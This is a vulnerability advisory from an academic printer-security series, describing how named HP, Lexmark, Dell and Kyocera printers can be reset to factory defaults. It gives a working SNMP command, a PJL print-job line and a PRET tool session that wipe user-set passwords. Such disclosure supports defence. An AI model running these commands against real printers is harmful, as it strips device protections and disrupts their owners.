TL;DR: In the scope of academic research on printer security, various vulnerabilities in network printers and MFPs have been discovered. This is advisory 5 of 6 of the `Hacking Printers' series. Each advisory discusses multiple issues of the same category. This post is about resetting a printer to factory defaults through ordinary print jobs, therefore bypassing all protection mechanisms like user-set passwords. The attack can be performed by anyone who can print, for example through USB or network. It can even be carried out by a malicious website, using cross-site printing techniques (see http://hacking-printers.net/wiki/index.php/Cross-site_printing). ========================[ Factory Defaults ]========================== -------------------------[ Affected Devices ]------------------------- This vulnerability has been verfied for the devices listed below: - HP LaserJet 4200N (Firmware version: 20050602) a PML based attacks - HP LaserJet 4250N (Firmware version: 20150130) a PML based attacks - HP LaserJet P2015dn (Firmware version: 20070221) a PML based attacks - HP LaserJet M2727nfs (Firmware version: 20140702) a PML based attacks - HP LaserJet 3392 AiO (Firmware version: 20120925) a PML based attacks - HP LaserJet CP1515n (Firmware version: 20120110) a PML based attacks - Lexmark X264dn (Firmware version: NR.APS.N645) a SNMP only - Lexmark E360dn (Firmware version: NR.APS.N645) a SNMP only - Lexmark C736dn (Firmware version: NR.APS.N644) a SNMP only - Dell 1720n (Firmware version: NM.NA.N099) a SNMP only - Kyocera FS-C5200DN (Firmware version: 2011.05.16) a SNMP only Further HP printers are likely to be affected. Vendor informed: 2016-10-17 --------------------[ Vulnerability Description ]--------------------- The `Printer-MIB' (RFC3805) defines the prtGeneralReset Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restore factory defaults (resetToFactoryDefaults(6)) using SNMP (port 161/udp). This is a legitimate feature, but can also be used by an attacker to remove/bypass protection mechanisms like user-set passwords for the embedded web server, PJL and PostScript if the default/public SNMP community string has not been changed: ---------------------------------------------------------------------- snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 ---------------------------------------------------------------------- In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, she can transform SNMP into its PML representation and embed the request within a legitimate print job: ---------------------------------------------------------------------- @PJL DMCMD ASCIIHEX="040006020501010301040106" ---------------------------------------------------------------------- This way, anyone who can print can reset the device to factory defaults and hereby remove any protection mechanisms. -------------------------[ Proof of Concept ]------------------------- A Python based proof of concept software entitled Printer Exploitation Toolkit (PRET) has been published. The attack can be reproduced as follows: $ git clone https://github.com/RUB-NDS/PRET.git $ cd PRET $ ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset Note that if your printer does not restart and restore factory defaults, it may still be vulnerable to SNMP based attacks as mentioned above. -----------------------[ Further Information ]------------------------ Information on this bug/feature of SNMP and PML can be found at: http://hacking-printers.net/wiki/index.php/Factory_defaults https://tools.ietf.org/html/rfc3805